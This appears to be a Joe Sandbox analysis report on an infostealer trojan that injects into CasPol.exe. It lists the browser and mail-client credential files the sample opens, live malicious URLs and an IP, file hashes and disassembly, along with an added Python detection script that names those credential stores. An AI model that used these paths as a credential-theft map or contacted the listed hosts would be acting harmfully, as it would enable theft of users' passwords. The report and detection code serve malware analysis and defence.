Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\6culQoI97a.exe | Code function: 2_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR
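Worked example (added here, not Joe Sandbox or vendor code): detection logic for the two behaviours the previous two sections record, the dropper creating CasPol.exe and writing into its memory, and the injected CasPol.exe opening browser and mail-client credential stores. It runs over constructed records shaped like Sysmon ProcessCreate (event 1) and ProcessAccess (event 10) events plus file and registry opens; the field names, the list of injection targets, the parent allow-list, the CasPol command-line switches in the benign record and the store-owner process names (IncMail.exe for IncrediMail in particular) are assumptions to tune per environment. Two points it encodes that the raw lines do not spell out: a hollowed CasPol.exe carries the dropper's path as its command line, and the memory write the report shows needs a handle with PROCESS_VM_WRITE/PROCESS_VM_OPERATION/PROCESS_CREATE_THREAD, which is what the access-mask check looks for.

```python
"""Detection rules for process injection into CasPol.exe and for
credential-store access by a non-owner process.

Added example, not Joe Sandbox or vendor code. Event records are constructed
in a Sysmon-like shape; field names and allow-lists are assumptions.
"""
from __future__ import annotations

from fnmatch import fnmatch
from pathlib import PureWindowsPath

# Signed .NET framework binaries that commodity loaders hollow (assumed list).
INJECTION_TARGETS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
# Parents that legitimately launch those tools (assumed baseline, tune per estate).
EXPECTED_PARENTS = {"devenv.exe", "msbuild.exe", "cmd.exe", "powershell.exe"}

# Access rights that allow writing a payload into another process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Credential stores from the report, each with the process allowed to read it
# (owner binary names are assumptions; patterns are matched case-insensitively).
CREDENTIAL_STORES = [
    (r"*\google\chrome\user data\*\login data", {"chrome.exe"}),
    (r"*\microsoft\edge\user data\*\login data", {"msedge.exe"}),
    (r"*\mozilla\firefox\profiles.ini", {"firefox.exe"}),
    (r"*\thunderbird\profiles.ini", {"thunderbird.exe"}),
    (r"hkey_current_user\software\microsoft\windows nt\currentversion"
     r"\windows messaging subsystem\profiles\*", {"outlook.exe"}),
    (r"hkey_current_user\software\incredimail\identities*", {"incmail.exe"}),
]


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect_injection(events: list[dict]) -> list[str]:
    """Flag an injection target spawned by an unexpected parent or with a foreign
    command line, and any handle to it opened with write/thread rights."""
    findings = []
    for ev in events:
        if ev["type"] == "ProcessCreate" and basename(ev["image"]) in INJECTION_TARGETS:
            image, parent = basename(ev["image"]), basename(ev["parent_image"])
            # A hollowed child often carries the parent's path as its command line.
            own_cmdline = image in ev["command_line"].lower()
            if parent not in EXPECTED_PARENTS or not own_cmdline:
                findings.append(f"{parent} spawned {image} with command line {ev['command_line']!r}")
        elif ev["type"] == "ProcessAccess" and basename(ev["target_image"]) in INJECTION_TARGETS:
            src, dst = basename(ev["source_image"]), basename(ev["target_image"])
            if src != dst and ev["granted_access"] & INJECT_RIGHTS:
                findings.append(f"{src} opened {dst} with rights 0x{ev['granted_access']:X}")
    return findings


def detect_credential_access(events: list[dict]) -> list[str]:
    """Flag file or registry opens on a credential store by a non-owner process."""
    findings = []
    for ev in events:
        if ev["type"] not in ("FileOpen", "RegOpen"):
            continue
        target, actor = ev["target"].lower(), basename(ev["image"])
        for pattern, owners in CREDENTIAL_STORES:
            if fnmatch(target, pattern) and actor not in owners:
                findings.append(f"{actor} opened credential store {ev['target']}")
                break
    return findings


DROPPER = r"C:\Users\user\Desktop\6culQoI97a.exe"
CASPOL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

# Constructed sample events mirroring the report's behaviour lines, plus two
# benign baseline records that must not fire.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": CASPOL, "parent_image": DROPPER, "command_line": DROPPER},
    {"type": "ProcessAccess", "source_image": DROPPER, "target_image": CASPOL, "granted_access": 0x1FFFFF},
    {"type": "FileOpen", "image": CASPOL,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "FileOpen", "image": CASPOL, "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"type": "RegOpen", "image": CASPOL,
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"type": "FileOpen", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "ProcessCreate", "image": CASPOL, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": CASPOL + " -m -lg"},
]

if __name__ == "__main__":
    for f in detect_injection(SAMPLE_EVENTS) + detect_credential_access(SAMPLE_EVENTS):
        print("ALERT:", f)
```

The two rules are independent: the injection rule fires on the dropper's ProcessCreate and on the write-capable handle, the credential rule on the three store opens by CasPol.exe, while chrome.exe reading its own Login Data and cmd.exe launching CasPol with its own switches stay silent.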

Remote Access Functionality

Source: Yara match | File source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 2424, type: MEMORYSTR
MITRE ATT&CK matrix (cells separated by "|"; bracketed digits are the report's signature-count badges as extracted; rows with 13 cells contain one empty cell whose position could not be recovered)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | [211] Windows Management Instrumentation | [1] DLL Side-Loading | [1] Access Token Manipulation | [11] Masquerading | [1] OS Credential Dumping | [331] Security Software Discovery | Remote Services | [1] Email Collection | Exfiltration Over Other Network Medium | [1] Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | [1] System Shutdown/Reboot
Default Accounts | [1] Native API | Boot or Logon Initialization Scripts | [111] Process Injection | [1] Disable or Modify Tools | LSASS Memory | [1] Process Discovery | Remote Desktop Protocol | [1] Archive Collected Data | Exfiltration Over Bluetooth | [1] Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | [1] DLL Side-Loading | [241] Virtualization/Sandbox Evasion | Security Account Manager | [241] Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | [1] Data from Local System | Automated Exfiltration | [1] Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | [1] Access Token Manipulation | NTDS | [1] Application Window Discovery | Distributed Component Object Model | [1] Clipboard Data | Scheduled Transfer | [11] Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | [111] Process Injection | LSA Secrets | [2] File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | [1] Obfuscated Files or Information | Cached Domain Credentials | [117] System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | [1] DLL Side-Loading | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Initial sample (Source | Detection | Scanner | Label):
6culQoI97a.exe | 73% | ReversingLabs | Win32.Trojan.Woreflint
6culQoI97a.exe | 57% | Virustotal |

Dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\nspCBC.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE files (Source | Detection | Scanner | Label):
2.0.6culQoI97a.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
2.2.6culQoI97a.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491

Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | Avira URL Cloud | safe
ftp://ftp.gettoner.com.mx/droid | 100% | Avira URL Cloud | malware
http://195.178.120.24/mhpgXW188.chm | 100% | Avira URL Cloud | malware
http://NwSpLV.com | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | Virustotal |
          No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://195.178.120.24/mhpgXW188.chm | false | Avira URL Cloud: malware | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://NwSpLV.com | CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error | 6culQoI97a.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | 6culQoI97a.exe | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
ftp://ftp.gettoner.com.mx/droid | CasPol.exe, 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
195.178.120.24 | unknown | unknown | 31564 | HEXAGLOBE-ASFR | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 755473
Start date and time: 2022-11-28 19:15:02 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 33s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 6culQoI97a.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/4@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 24.5% (good quality ratio 24%)
• Quality average: 88.3%
• Quality standard deviation: 22.1%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.77.2.164
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
              No simulations
              No context
Process: C:\Users\user\Desktop\6culQoI97a.exe
File Type: data
Category: dropped
Size (bytes): 151484
Entropy (8bit): 6.722739524237379
Encrypted: false
SSDEEP: 3072:i/XcPN2AMaEryngg6xwigaQTpHJVoBMQ/fV:ikUUhnfJrZzcMQ/fV
MD5: 7D35914613D5AE2EE21358270112B5F2
SHA1: ED7CBBBBC35EBCA9F221B1E22927BF2845B54807
SHA-256: DF9AA833D7E0B7455D5112DF644234B735D4F8C4E2A1527148E655DE16DA4BA3
SHA-512: 29F422C4B45EE72141D040EA7682A6D4C90858EA42F2FF461A6301B90195F5DF6F79B5F364B55D61A327EE1E5BAAE26F317E42B3965EDBD1ED42EF7F4FCB7793
Malicious: false
Reputation: low
              Preview:..zx'il...Y........W.7...HF..$K..B.+.z.$i.z.M6.O..0wG;~Fm.....!gJn..M;&..-Lm.S<......B..*Q.N.).C....x.h`.[o....*...IL@..^..e(...H....F<U...,.M8m>.l..F...o...W......4....l<h..f....yK...a..n.....LM.*.U..S7]..b..V..;.W-..pL.k..........w...U...9F..;y.....H..jc......u....\.V...%.O..r.a3=&.mE9.........G..c..Y.&.....|...*..X.~.`...=...e6..W.........w..7..B.U.".m....Q;T..D..A[...E.{...[..f..".....D#a...........sd...l,..t....)tU.[ .u\.M...{3UP...~c_u.......dK..=.1.?..}8.TP.+P.z.H{.>'..2%a...}.f.e|3C.....R(...Q.`F~..N}Q]H.!.....+.....Y.G...d.\U."......Z....../c..%.t.....@8...D.1.S....N........q.......Kq..........................................................................f.................l.d)f................................................................................................................f.e....f.b..i.LZ.....................................................................................................f!............H...6qqqqqqqqqqqqqqqqqqqqqqq
Process: C:\Users\user\Desktop\6culQoI97a.exe
File Type: ASCII text, with very long lines (42820), with no line terminators
Category: dropped
Size (bytes): 42820
Entropy (8bit): 3.999720795205128
Encrypted: false
SSDEEP: 768:Y8gLgZjz0mqZY9XVZ3z0Aqa2ogrBpnu2L9l6+EfD5u6IZ46hj0HJPn1W4:LgLgNuYBrA75oIpu2Rl6+20v46QF17
MD5: 63EE366B70BC4507D462A94DD9C637BA
SHA1: E0E3D34620C83C47F0590BD059AE2066D7F26FE7
SHA-256: D032E1E9FA29373C0D811D0ED484D69F64DF02C0353DC2B7B4F2D08C44094F8A
SHA-512: 096C8D578842BE10D2B5D88DF5B130EE3D352190158CBF893DC2AC106D2DF6A91BFA17A92F5F48D3EC952A83DB785A05076AC340015832E5EF4D08D5E584EF00
Malicious: false
Reputation: low
Preview:
Process: C:\Users\user\Desktop\6culQoI97a.exe
File Type: SVG Scalable Vector Graphics image
Category: dropped
Size (bytes): 1626
Entropy (8bit): 5.039495966615547
Encrypted: false
SSDEEP: 24:t42w+Fdw6OyKbRAecFxVrGMalOY3bYnfS/YH6AAHD1gyKbRAecFxVrGMaFC:fONtAecFmMiScmNtAecFmMmC
MD5: CCC1083D634E112EBE2FAD8D1809FEB7
SHA1: AFBBB71D1B029B7FBE45E09C7217945A2668D262
SHA-256: 3D961823A04BAC2FF8748D7624AF7D06B10B3D2566AA93540ADB1FC46F6FA6CF
SHA-512: 3962F71527D2B662D5B9EACA2AF12AE414F01497871F3E818D86A9DF03DC9C08F1A9873265F70745857D65ADA87E623E523BEB80B51CCA99E820C459757B96D2
Malicious: false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16.006" height="16.013"><path d="M12.98 0a1 1 0 00-.11.01H8v.832A1 1 0 009 2.01h1.586L8 4.596 5.707 2.303a1 1 0 10-1.414 1.414l3 3a1 1 0 001.414 0L12 3.424V5.01a1 1 0 001.158 1H14V1.137a1 1 0 000-.275V.01h-.854A1 1 0 0012.98 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#000" font-weight="400" font-family="sans-serif" overflow="visible" fill="#2e3436"/><path class="error" d="M14.242 15.725a.979.979 0 01-1.387 0l-1.04-1.04-1.041-1.04a.979.979 0 010-1.387l.493-.493a6.838 6.838 0 00-6.534 0l.493.493a.979.979 0 010 1.387l-1.04 1.04-1.04 1.04a.979.979 0 01-1.388 0l-1.
Process: C:\Users\user\Desktop\6culQoI97a.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.854450882766351
Encrypted: false
SSDEEP: 192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
MD5: 34442E1E0C2870341DF55E1B7B3CCCDC
SHA1: 99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
SHA-256: 269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
SHA-512: 4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):6.777623756268328
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:6culQoI97a.exe
              File size:334430
              MD5:d9aa122b8c39444799e60eabbab69502
              SHA1:0175baf7a240c2050571a6df273a892e8b192d81
              SHA256:317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143
              SHA512:4ba7e997ffad2ce396faa08d8be8cd6b7073e37828b347fad1ca3f1112d257ecd235c7df9d3d6c78e6b9f96ce878c5fbe2d2a70f7428648f1d2aa14aba7f5d38
              SSDEEP:6144:0x/MQs/IvHdjSzIH1qrb+WECj3wc0ibE0+Ix:wxAIVu8VWb+WEY3LbEt6
              TLSH:7964F1253F64DC27C2A906708EF3D329D6F9D9406E634717BB8177ACBD31780B91A18A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@
              Icon Hash:6070dee2bab2c43c
              Entrypoint:0x403325
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:ced282d9b261d1462772017fe2f6972b
              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080B8h]
              call dword ptr [004080BCh]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [007A2F6Ch], eax
              je 00007F1928426BF3h
              push ebx
              call 00007F1928429D56h
              cmp eax, ebx
              je 00007F1928426BE9h
              push 00000C00h
              call eax
              mov esi, 004082A0h
              push esi
              call 00007F1928429CD2h
              push esi
              call dword ptr [004080CCh]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F1928426BCDh
              push 0000000Bh
              call 00007F1928429D2Ah
              push 00000009h
              call 00007F1928429D23h
              push 00000007h
              mov dword ptr [007A2F64h], eax
              call 00007F1928429D17h
              cmp eax, ebx
              je 00007F1928426BF1h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F1928426BE9h
              or byte ptr [007A2F6Fh], 00000040h
              push ebp
              call dword ptr [00408038h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [007A3038h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0079E528h
              call dword ptr [0040816Ch]
              push 0040A188h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
Name                                 Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT         0x8438           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       0x3c7000         0x28868       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY       0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC      0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG          0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS            0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT            0x8000           0x29c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED       0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy            Characteristics
.text   0x1000           0x6230        0x6400    False     0.6699609375     data       6.441889952551939  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x1274        0x1400    False     0.4337890625     data       5.061067348371254  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x399078      0x600     unknown   unknown          unknown    unknown            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x3a4000         0x23000       0x0       False     0                empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x3c7000         0x28868       0x28a00   False     0.5296875        data       5.194338163153121  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA       Size     Type                                                                                Language  Country
RT_BITMAP      0x3c73b8  0x368    Device independent bitmap graphic, 96 x 16 x 4, image size 768                      English   United States
RT_ICON        0x3c7720  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584                 English   United States
RT_ICON        0x3d7f48  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 38016                  English   United States
RT_ICON        0x3e13f0  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 21600                  English   United States
RT_ICON        0x3e6878  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16896                  English   United States
RT_ICON        0x3eaaa0  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9600                    English   United States
RT_ICON        0x3ed048  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224                    English   United States
RT_ICON        0x3ee0f0  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2400                    English   United States
RT_ICON        0x3eea78  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088                    English   United States
RT_DIALOG      0x3eeee0  0x144    data                                                                                English   United States
RT_DIALOG      0x3ef028  0x13c    data                                                                                English   United States
RT_DIALOG      0x3ef168  0x100    data                                                                                English   United States
RT_DIALOG      0x3ef268  0x11c    data                                                                                English   United States
RT_DIALOG      0x3ef388  0xc4     data                                                                                English   United States
RT_DIALOG      0x3ef450  0x60     data                                                                                English   United States
RT_GROUP_ICON  0x3ef4b0  0x76     data                                                                                English   United States
RT_MANIFEST    0x3ef528  0x33e    XML 1.0 document, ASCII text, with very long lines (830), with no line terminators  English   United States
DLL           Imports
ADVAPI32.dll  RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
